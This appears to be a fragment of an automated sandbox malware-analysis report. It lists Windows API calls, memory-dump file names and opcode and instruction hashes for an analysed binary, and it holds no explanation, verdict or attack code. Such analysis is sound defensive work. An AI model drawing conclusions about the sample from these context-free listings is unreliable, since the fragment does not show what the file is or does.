                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EDB5A5
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00F3E69A
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F3E6A4
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00F3E6AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4127811313-0
                                                                                                                                                                                                                                                      • Opcode ID: 26723917aa934a451a6535e3a7b6081489ab95e224291def5baa0601166010c8
                                                                                                                                                                                                                                                      • Instruction ID: c061b3c29035e146ea42fe61c8134dde1e403f0e608e5402ec992b7ff8c3c8f2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26723917aa934a451a6535e3a7b6081489ab95e224291def5baa0601166010c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0211F535900029FBDF109F94E8469EE77B9EF19314F110456E941A6241E734AA92EBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00F07352
                                                                                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00F07385
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F0739B
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F073A2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                                                                                      • Opcode ID: 69af3936247c48ed1e5ae289a895c6733de6f5fb653ad744d83aeef91b972b49
                                                                                                                                                                                                                                                      • Instruction ID: 2d1606e2b951435d0c90aa15a3f4ab76aec4453aac629614bfab1e3fae53060b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69af3936247c48ed1e5ae289a895c6733de6f5fb653ad744d83aeef91b972b49
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1110476E04208BFD711AFA8DC05AEE7BADAB45320F044395FD21D32A1D6709E00B7A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00EDD1CE
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                                                                                      • Opcode ID: 2d9a2cdb77e432a4603312a90adbae60f1a9e57e17f0b4ce8c469a08c366582d
                                                                                                                                                                                                                                                      • Instruction ID: e3c308e4c244d948c81deb4dcb7a31045f0e89377c0366bafc0ddaa99ecb4880
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d9a2cdb77e432a4603312a90adbae60f1a9e57e17f0b4ce8c469a08c366582d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A811ADB210650DBFEF124FA09C50EEABB6DFF19368F041102FE14A2250C7319C61ABA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                                                                                      • Instruction ID: dd95914d55d1384eac4c6fad2ffb165bf060513e9ff97fb7929a4337f7a02c1d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9014C7604014EBBCF125E84DC018EE3F63BB28354B589455FF2969075D336CAB1AB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7A0D: __getptd_noexit.LIBCMT ref: 00EE7A0E
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EE748F
                                                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00EE74AC
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00EE74BF
                                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(011468D0), ref: 00EE74D7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2704283638-0
                                                                                                                                                                                                                                                      • Opcode ID: d60ee41d20a17917b3fa0629ce4ac99733ad4017609ff50ed20f75f1741919ad
                                                                                                                                                                                                                                                      • Instruction ID: 0640850f1170f9335fc15d3233a4fced69999fae37b4cf3ba0bfd745c23a59aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d60ee41d20a17917b3fa0629ce4ac99733ad4017609ff50ed20f75f1741919ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7601D63190576D97D722AF66940575DBBA0BF04718F155005F8ACB76C0C7305941EFD3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EE7AD8
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7CF4: __mtinitlocknum.LIBCMT ref: 00EE7D06
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7CF4: EnterCriticalSection.KERNEL32(00000000,?,00EE7ADD,0000000D), ref: 00EE7D1F
                                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00EE7AE5
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EE7AF9
                                                                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00EE7B17
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1687444384-0
                                                                                                                                                                                                                                                      • Opcode ID: 5c6bd53e7124f9fe54fe0d5735e9c5447e12d23e4e492ce375ee3e028dad4d02
                                                                                                                                                                                                                                                      • Instruction ID: 378b8ccf2cea6ecc6b98066fcbe0de78fc070a34a008b74d657114e0c98d2302
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c6bd53e7124f9fe54fe0d5735e9c5447e12d23e4e492ce375ee3e028dad4d02
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A016D71404B48EFD730DF76D90574ABBF0AF54325F20990EA4DAA72A1CBB0A680DB02
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2E33D
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2E34C
                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F83D00,00F83D44), ref: 00F2E37B
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00F2E38D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3277943733-0
                                                                                                                                                                                                                                                      • Opcode ID: bef57e84efae032b60c75a9bcb7d176db390eb01f4b31a4cd682d5f770621706
                                                                                                                                                                                                                                                      • Instruction ID: 5051bdc9f97584b2088221fa4c7df2f1323a8f396a466fae847c709b8d611c36
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bef57e84efae032b60c75a9bcb7d176db390eb01f4b31a4cd682d5f770621706
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BF05EF254031CBBE6106BA1AC45FB77E9CDB05F54F014421FE08E61B2D3B59E00A7A8
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EDAFE3
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDAFF2
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: BeginPath.GDI32(?), ref: 00EDB009
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDB033
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F2EA8E
                                                                                                                                                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 00F2EA9B
                                                                                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 00F2EAAB
                                                                                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 00F2EAB9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                                                                                                      • Opcode ID: 8e5ab274ae8cdec515c65cefd8c1a1a960ea6b29664fc696c3b0d75953deee82
                                                                                                                                                                                                                                                      • Instruction ID: 749f99dde684baea8d015d012199f099ef49732ef4063998653a612f572bc245
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e5ab274ae8cdec515c65cefd8c1a1a960ea6b29664fc696c3b0d75953deee82
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0E23100526CBBDB129FA8AC0EFCE3F19AF26320F184201FE01610E183B85652EB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EFC84A
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EFC85D
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00EFC864
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 00EFC86B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                                                                                                      • Opcode ID: 8757013430b9e914af2b8928b7d899f462e614a1a6116e1a2d523ca4cf30538b
                                                                                                                                                                                                                                                      • Instruction ID: 08f310f98a30694fd857e34e984c96fb0c95add121bf4ffce3ae80ef1ad03a06
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8757013430b9e914af2b8928b7d899f462e614a1a6116e1a2d523ca4cf30538b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EE06D7514126CBAEB201BA2DC0DEEB7F1CEF267A1F508421BA0D94460C7B1D580EBE0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00EFB0D6
                                                                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00EFAC9D), ref: 00EFB0DD
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EFAC9D), ref: 00EFB0EA
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00EFAC9D), ref: 00EFB0F1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3974789173-0
                                                                                                                                                                                                                                                      • Opcode ID: 13dfe4227de59b111df18be3c2fa653a126c6a861fcb60b98e436e5ebc263e44
                                                                                                                                                                                                                                                      • Instruction ID: 759d4af9f9cdad6697bef2e498f36198642af60e5a9a9e8ec537caef8672d8db
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13dfe4227de59b111df18be3c2fa653a126c6a861fcb60b98e436e5ebc263e44
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45E08636701215DBD7201FB59C0CB573BA8EF66795F018818FB41D6040EB348441D760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00EDB496
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00EDB4A0
                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00EDB4B5
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00EDB4BD
                                                                                                                                                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 00F3DE2B
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F3DE38
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00F3DE51
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00F3DE6A
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00F3DE8A
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F3DE95
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1946975507-0
                                                                                                                                                                                                                                                      • Opcode ID: e2ba70228796e9a2c5d0eb40ce1724b2f3bbfad37a74f24455ea9bc279735823
                                                                                                                                                                                                                                                      • Instruction ID: 86e9ed8934e5c3b033c1e30d5b2bd105ee6999160a2fcd9f2f45f4fbf83b80b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2ba70228796e9a2c5d0eb40ce1724b2f3bbfad37a74f24455ea9bc279735823
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E0ED35500284AAEB215B64BC09BD83F11AB66339F14C666FEBA980E2D7714581EB11
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EFB2DF
                                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00EFB2EB
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EFB2F4
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EFB2FC
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAB24: GetProcessHeap.KERNEL32(00000000,?,00EFA848), ref: 00EFAB2B
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAB24: HeapFree.KERNEL32(00000000), ref: 00EFAB32
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
